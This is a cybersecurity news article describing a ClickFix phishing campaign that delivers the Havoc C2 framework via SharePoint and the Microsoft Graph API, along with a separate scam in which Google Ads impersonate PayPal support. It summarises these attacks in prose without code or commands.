Havoc Phishing Attack

Cybersecurity investigators have uncovered a new phishing campaign that leverages the ClickFix technique to deploy Havoc, an open-source Command-and-Control (C2) framework. The attackers cleverly conceal malware stages behind a SharePoint site, utilizing a modified version of the Havoc Demon along with the Microsoft Graph API to disguise communications within legitimate services.

The Phishing Trap: A Deceptive Email and ClickFix Manipulation

The attack is triggered by a phishing email that contains an HTML attachment named Documents.html. When opened, the file displays an error message that manipulates the victim into copying and executing a tampered PowerShell command. This technique, known as ClickFix, tricks users into believing they need to fix a OneDrive connection issue by manually updating their DNS cache.

If the target falls for the trick, they inadvertently initiate the infection process by running a PowerShell script that connects to an attacker-controlled SharePoint server.

Multi-Stage Malware Deployment: From PowerShell to Python

Once the unsafe PowerShell script executes, it first checks whether the environment is sandboxed to evade detection. If deemed safe, the script proceeds to download Python ('pythonw.exe') if it has not already been installed on the system.

From there, a second PowerShell script fetches and executes a Python-based shellcode loader, which then launches KaynLdr, a reflective loader written in C and Assembly. This ultimately deploys the Havoc Demon agent on the compromised machine.

Havoc’s Capabilities: A Stealthy Cyber Weapon

The attackers use Havoc in tandem with the Microsoft Graph API to conceal C2 traffic within well-known, trusted services. Havoc's functionalities include:

• Information gathering
• File operations
• Command execution
• Payload execution
• Token manipulation
• Kerberos attacks

Google Advertisements Exploited to Target PayPal Users

In a separate yet alarming development, cybersecurity experts have also observed threat actors exploiting Google Ads policies to target PayPal users with fraudulent advertisements.

These tactics work by impersonating legitimate PayPal support pages and tricking users into calling a fake customer service number. The goal is to collect victims' personal and financial information by convincing them they are speaking with legitimate PayPal representatives.

Google Advertisements Loophole: A Playground for Fraudsters

The success of these technical support tactics hinges on a loophole in Google Ads policies, which allows bad actors to impersonate well-known brands. As long as the landing page (final URL) and the display URL match the same domain, fraudsters can create convincing fake advertisements.

Cybercriminals are quick to exploit popular search terms, particularly those related to customer support and account recovery, ensuring that their fraudulent ads appear at the top of search results.

Conclusion: A Rising Threat Landscape

From ClickFix-powered phishing campaigns to Google Ads abuse, cybercriminals are continuously refining their social engineering tactics. These threats highlight the importance of vigilance, user awareness, and enhanced security measures to mitigate the risks posed by evolving cyberattacks.